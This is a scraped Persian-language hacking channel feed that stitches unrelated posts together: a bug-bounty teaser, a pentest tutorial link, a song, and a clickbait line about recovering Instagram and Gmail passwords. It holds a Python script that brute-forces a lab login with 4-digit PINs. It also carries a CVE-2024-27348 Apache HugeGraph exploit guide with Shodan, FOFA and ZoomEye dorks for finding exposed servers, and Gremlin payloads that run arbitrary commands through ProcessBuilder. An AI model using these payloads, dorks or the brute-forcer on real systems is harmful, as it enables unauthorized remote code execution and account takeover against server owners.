Code Block
این یکی گزارشمو توی هکروان شیر میکنم باهاتون اما چرا فقط این و گذاشتم ؟ چون یک تارگتی بود که خفن ت
خوب شانستون زد داپلیکیت هم نخورد پس یه آموزش کشف آسیب پذیری از پلتفرم خارجی توی هکروان حتی اگه بهترینا روش کار کرده باشن طلبتون !
🖱 🎩آموزش پروتکل HTTP برای تست نفوذ وب
🔤 #web
❕چکیده مطلب:
در این مقاله کامل با پروتکل HTTP برای تست نفوذ آشنا شوید. این آموزش مفاهیم مهمی مانند ارسال درخواست، کدهای وضعیت، کوکیها و هدرها را برای هکرهای مبتدی توضیح میدهد.💻
⌛ زمان مطالعه : 11 دقیقه
⬅️لینک آموزش➡️
Code Block
اگر به گیت هاب دستترسی ندارید به یک BruteForcer صفحه لاگین نیاز دارید میتونید از این قطعه کد کمک بگیرید:
import requests
url = "http://zerodey.ir/labs/lab1/index.php"
username = "admin"
# Generating 4-digit numeric passwords (0000-9999)
password_list = [str(i).zfill(4) for i in range(10000)]
def brute_force():
for password in password_list:
data = {"username": username, "password": password}
response = requests.post(url, data=data)
if "Invalid" not in response.text:
print(f"[+] Found valid credentials: {username}:{password}")
break
else:
print(f"[-] Attempted: {password}")
brute_force()
The Stranglersaudio-golden-brown-by-the-stranglers.mp3
زمان:
حجم:
4.5M
Good night everyone💤
2.4M حجم رسانه بالاست
مشاهده در ایتا
🔻🎥بازیابی رمز اینستاگرام و جیمیل در ۳۰ ثانیه!
🔓 CVE-2024-27348 — آسیبپذیری بحرانی RCE در Apache HugeGraph-Server 🔓
🟢 CVE-2024-27348 یک آسیبپذیری بسیار مهم و بحرانی (Critical) با امتیاز CVSS 9.8 در Apache HugeGraph-Server است که در نسخههای 1.0.0 تا قبل از 1.3.0 وجود دارد. این آسیبپذیری از نوع Remote Code Execution (اجرای کد از راه دور) بوده و به مهاجم اجازه میدهد بدون احراز هویت، دستورات دلخواه را روی سرور اجرایی کند.
https://nvd.nist.gov/vuln/detail/cve-2024-27348
📌 چه اتفاقی میافتد؟
آسیبپذیری در تعامل با Gremlin (زبان پرسوجوی گراف) یا بخشهای مدیریتی HugeGraph قرار دارد. مهاجم با ارسال ورودیهای خاص میتواند از ضعف کنترل دسترسی سوءاستفاده کند و کد دلخواهش را روی سرور اجرا نماید.
📍 پیامدها:
دسترسی کامل به سیستم
افشای دادههای حساس
نصب بدافزار یا ایجاد بکدور
مختل کردن سرویسها و حذف/تغییر دادهها
👾 shodan dork
1 http.title:"HugeGraph"
2 http.html:"HugeGraph Server"
3 product:"Apache HugeGraph"
4 port:8080 "HugeGraph"
👾 fofa dork
1 app="Apache-HugeGraph"
2 title="HugeGraph"
3 body="HugeGraph Server"
4 server="HugeGraph"
5 body="gremlin" && body="HugeGraph"
6 app="Apache-HugeGraph" && port="8080"
👾ZoomEye Dorks
1 app:"Apache HugeGraph"
2 service:"HugeGraph"
3 title:"HugeGraph"
exploit
http://target.com/gremlin
🧪 روش تست دستی با Burp Suite ( PoC)
1 رهگیری درخواست
Burp → Proxy → Intercept ON
وارد مسیر /gremlin درخاست رو از گت به پست تغیر میدیم
POST /gremlin HTTP/1.1
Host: target:8080
Content-Type: application/json
Content-Length: ...
{
"gremlin": f"def result = \"{ls}\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(result);",
}
.....................
payload 1
{
"gremlin": f"Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList({formatted_words});Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);",
"bindings": {},
"language": "gremlin-groovy",
"aliases": {}
}
payload 2
"gremlin": f"def result = \"{command}\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(result);",
}
2
https://github.com/jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE
3 https://github.com/kljunowsky/CVE-2024-27348/blob/main/CVE-2024-27348.py